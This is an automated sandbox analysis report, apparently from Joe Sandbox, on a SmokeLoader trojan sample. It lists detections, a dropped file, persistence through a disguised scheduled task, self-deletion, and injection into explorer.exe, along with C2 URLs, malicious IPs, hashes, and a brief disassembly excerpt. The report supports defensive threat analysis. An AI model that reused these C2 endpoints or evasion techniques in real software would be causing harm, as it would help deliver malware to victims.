152.231.120.3, 57077, 59097, 59098 ENTELCHILESACL Chile 12->29 17 C:\Users\user\AppData\Roaming\wdhwgdv, PE32 12->17 dropped 19 C:\Users\user\...\wdhwgdv:Zone.Identifier, ASCII 12->19 dropped 53 System process connects to network (likely due to code injection or exploit) 12->53 55 Benign windows process drops PE files 12->55 57 Deletes itself after installation 12->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->59 file8 signatures9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe41%ReversingLabsWin32.Trojan.CrypterX
    file.exe41%VirustotalBrowse
    file.exe100%AviraHEUR/AGEN.1306978
    file.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\wdhwgdv100%AviraHEUR/AGEN.1306978
    C:\Users\user\AppData\Roaming\wdhwgdv100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\wdhwgdv41%ReversingLabsWin32.Trojan.CrypterX
    No Antivirus matches
    SourceDetectionScannerLabelLink
    tnc-corp.ru2%VirustotalBrowse
    volisc.biz6%VirustotalBrowse
    liverds.at5%VirustotalBrowse
    livbev.online6%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://aka.ms/odirmr0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
    https://powerpoint.office.comcember0%URL Reputationsafe
    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
    https://excel.office.com0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
    https://api.msn.com/q0%URL Reputationsafe
    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
    https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
    https://wns.windows.com/L0%URL Reputationsafe
    https://word.office.com0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://aka.ms/Vh5j3k0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
    https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
    https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://outlook.com_0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
    https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    tnc-corp.ru
    187.204.28.205
    truetrueunknown
    volisc.biz
    unknown
    unknowntrueunknown
    liverds.at
    unknown
    unknowntrueunknown
    livbev.online
    unknown
    unknowntrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://volisc.biz/tmp/index.phptrue
      unknown
      http://livbev.online/tmp/index.phptrue
        unknown
        http://liverds.at/tmp/index.phptrue
          unknown
          http://tnc-corp.ru/tmp/index.phptrue
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.miexplorer.exe, 00000001.00000000.1741445546.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1742823051.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1737667705.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://excel.office.comexplorer.exe, 00000001.00000000.1742823051.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.microexplorer.exe, 00000001.00000000.1733386877.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1733724160.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1741619772.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://api.msn.com/qexplorer.exe, 00000001.00000000.1737667705.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1742823051.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1742823051.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://word.office.comexplorer.exe, 00000001.00000000.1742823051.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.micrexplorer.exe, 00000001.00000000.1741445546.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1737667705.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    unknown
                                    https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://api.msn.com/explorer.exe, 00000001.00000000.1737667705.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        https://outlook.com_explorer.exe, 00000001.00000000.1742823051.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              181.123.219.23
                                              unknownParaguay
                                              23201TelecelSAPYtrue
                                              152.231.120.3
                                              unknownChile
                                              27651ENTELCHILESACLtrue
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1538051
                                              Start date and time:2024-10-20 06:01:08 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 22s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:6
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:file.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@2/2@81/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 28
                                              • Number of non-executed functions: 5
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              TimeTypeDescription
                                              00:02:23API Interceptor439356x Sleep call for process: explorer.exe modified
                                              05:02:24Task SchedulerRun new task: Firefox Default Browser Agent A21A43D25689C3C5 path: C:\Users\user\AppData\Roaming\wdhwgdv
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              152.231.120.3flvmrP8c9i.exeGet hashmaliciousSmokeLoaderBrowse
                                              • unicea.ws/tmp/index.php
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              tnc-corp.ruYpp1MuoIa1.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 190.220.21.28
                                              5iwz8543Xc.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 190.146.112.188
                                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 185.12.79.25
                                              z2vfX2REnQ.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 186.193.139.53
                                              d8jsKv1X4Q.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 177.222.41.236
                                              PSyWSlhDa5.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 58.151.148.90
                                              wxy6cQKIqG.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 211.171.233.126
                                              H3CVATCJSD.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 211.181.24.132
                                              Y0KE01P97o.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 187.199.203.72
                                              cmdkdOPiL0.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 187.199.203.72
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ENTELCHILESACLflvmrP8c9i.exeGet hashmaliciousSmokeLoaderBrowse
                                              • 152.231.120.3
                                              armv4l.elfGet hashmaliciousMiraiBrowse
                                              • 11.100.178.204
                                              armv7l.elfGet hashmaliciousMiraiBrowse
                                              • 11.124.126.113
                                              db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 181.43.17.81
                                              4Y8rbNhkaR.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 200.72.232.218
                                              na.elfGet hashmaliciousUnknownBrowse
                                              • 181.43.42.73
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 23.78.234.112
                                              HUWwCrf0mn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 186.67.223.184
                                              na.elfGet hashmaliciousUnknownBrowse
                                              • 11.96.171.155
                                              na.elfGet hashmaliciousUnknownBrowse
                                              • 11.121.5.46
                                              TelecelSAPYna.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 181.40.235.245
                                              mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 181.124.219.39
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 181.121.60.109
                                              8YxO3bxOUC.elfGet hashmaliciousMiraiBrowse
                                              • 181.121.59.224
                                              na.elfGet hashmaliciousUnknownBrowse
                                              • 181.122.141.200
                                              na.elfGet hashmaliciousMiraiBrowse
                                              • 181.40.239.95
                                              SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elfGet hashmaliciousMiraiBrowse
                                              • 181.121.5.27
                                              mips.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 181.124.220.45
                                              mips.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 181.120.81.120
                                              firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                              • 186.16.121.170
                                              No context
                                              No context
                                              Process:C:\Windows\explorer.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):377856
                                              Entropy (8bit):6.53330579906143
                                              Encrypted:false
                                              SSDEEP:6144:VaIYQL38hwc85w569ALrSsP5hglG+E3hX936mDtQhkBTI9I9jtj8OU8vJpm:VLLL8hh85wYytPrcG+0qk2hg/VtTB7m
                                              MD5:6495432F0808EB94291D12C862216FE2
                                              SHA1:B26485ED3EE5990D1C8363E743D8E0903E2B3433
                                              SHA-256:4DCF43767F4FD901EF13A37DA7499A54C61CF045A045186151A8BBEFC251EE6B
                                              SHA-512:60B929C8670CEF82A54FA274A8A9C010B516D87E61E5B45B8BD3D324E5D11F55A804ACB03FC760983D082AB2A3E8E772391C15F78FDCEF4AA9D5C13363566F2F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 41%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u@$.1!J.1!J.1!J./s.(!J./s.G!J./s..!J...1.4!J.1!K..!J./s..0!J./s.0!J./s.0!J.Rich1!J.........................PE..L....[9e.............................M............@.................................t.......................................X...<...................................................................@/..@............................................text...\........................... ..`.data............`..................@....rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\explorer.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.53330579906143
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:file.exe
                                              File size:377'856 bytes
                                              MD5:6495432f0808eb94291d12c862216fe2
                                              SHA1:b26485ed3ee5990d1c8363e743d8e0903e2b3433
                                              SHA256:4dcf43767f4fd901ef13a37da7499a54c61cf045a045186151a8bbefc251ee6b
                                              SHA512:60b929c8670cef82a54fa274a8a9c010b516d87e61e5b45b8bd3d324e5d11f55a804acb03fc760983d082ab2a3e8e772391c15f78fdcef4aa9d5c13363566f2f
                                              SSDEEP:6144:VaIYQL38hwc85w569ALrSsP5hglG+E3hX936mDtQhkBTI9I9jtj8OU8vJpm:VLLL8hh85wYytPrcG+0qk2hg/VtTB7m
                                              TLSH:D484E0213680C532E9B655304F31E2E65A7EFC722965814B77443BBE3E313C29AB935B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u@$.1!J.1!J.1!J./s..(!J./s..G!J./s...!J...1.4!J.1!K..!J./s..0!J./s..0!J./s..0!J.Rich1!J.........................PE..L....[9e...
                                              Icon Hash:64106e6656664a46
                                              Entrypoint:0x404de6
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x65395B95 [Wed Oct 25 18:16:53 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:0
                                              File Version Major:5
                                              File Version Minor:0
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:0
                                              Import Hash:fa634277cf7ca53dcfe49ebb014dd360
                                              Instruction
                                              call 00007F21387F4835h
                                              jmp 00007F21387F074Eh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 20h
                                              mov eax, dword ptr [ebp+08h]
                                              push esi
                                              push edi
                                              push 00000008h
                                              pop ecx
                                              mov esi, 004012ACh
                                              lea edi, dword ptr [ebp-20h]
                                              rep movsd
                                              mov dword ptr [ebp-08h], eax
                                              mov eax, dword ptr [ebp+0Ch]
                                              pop edi
                                              mov dword ptr [ebp-04h], eax
                                              pop esi
                                              test eax, eax
                                              je 00007F21387F08DEh
                                              test byte ptr [eax], 00000008h
                                              je 00007F21387F08D9h
                                              mov dword ptr [ebp-0Ch], 01994000h
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              push dword ptr [ebp-10h]
                                              push dword ptr [ebp-1Ch]
                                              push dword ptr [ebp-20h]
                                              call dword ptr [004010D4h]
                                              leave
                                              retn 0008h
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              push ecx
                                              push ebx
                                              mov eax, dword ptr [ebp+0Ch]
                                              add eax, 0Ch
                                              mov dword ptr [ebp-04h], eax
                                              mov ebx, dword ptr fs:[00000000h]
                                              mov eax, dword ptr [ebx]
                                              mov dword ptr fs:[00000000h], eax
                                              mov eax, dword ptr [ebp+08h]
                                              mov ebx, dword ptr [ebp+0Ch]
                                              mov ebp, dword ptr [ebp-04h]
                                              mov esp, dword ptr [ebx-04h]
                                              jmp eax
                                              pop ebx
                                              leave
                                              retn 0008h
                                              pop eax
                                              pop ecx
                                              xchg dword ptr [esp], eax
                                              jmp eax
                                              pop eax
                                              pop ecx
                                              xchg dword ptr [esp], eax
                                              jmp eax
                                              pop eax
                                              pop ecx
                                              xchg dword ptr [esp], eax
                                              jmp eax
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              push ecx
                                              push ecx
                                              push ebx
                                              push esi
                                              push edi
                                              mov esi, dword ptr fs:[00000000h]
                                              mov dword ptr [ebp-04h], esi
                                              mov dword ptr [ebp-08h], 00404EAEh
                                              push 00000000h
                                              push dword ptr [ebp+0Ch]
                                              push dword ptr [ebp-08h]
                                              push dword ptr [ebp+08h]
                                              call 00007F21387FDF25h
                                              Programming Language:
                                              • [ASM] VS2008 build 21022
                                              • [ C ] VS2008 build 21022
                                              • [C++] VS2008 build 21022
                                              • [IMP] VS2005 build 50727
                                              • [RES] VS2008 build 21022
                                              • [LNK] VS2008 build 21022
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4a6580x3c.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x9ee0.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x680000xd04.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f400x40.text
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1b8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x4a05c0x4a20096e51ed94bb13add85d8f3990145b7f8False0.7261343275716695data7.003544202786242IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .data0x4c0000x1199c0x600096142be66429191e63d42e6d1a442645False0.08296712239583333data0.9865295359522287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x5e0000x9ee00xa0007b10c1577034405fb38319c3073f89b9False0.4546142578125data5.148333936210553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x680000x1c3c0x1e007a4cdd3c4fa6b4ccb869d794090cf380False0.3671875data3.726000255969721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_CURSOR0x64d700x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                              RT_CURSOR0x650a00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                              RT_CURSOR0x651f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                              RT_CURSOR0x660a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
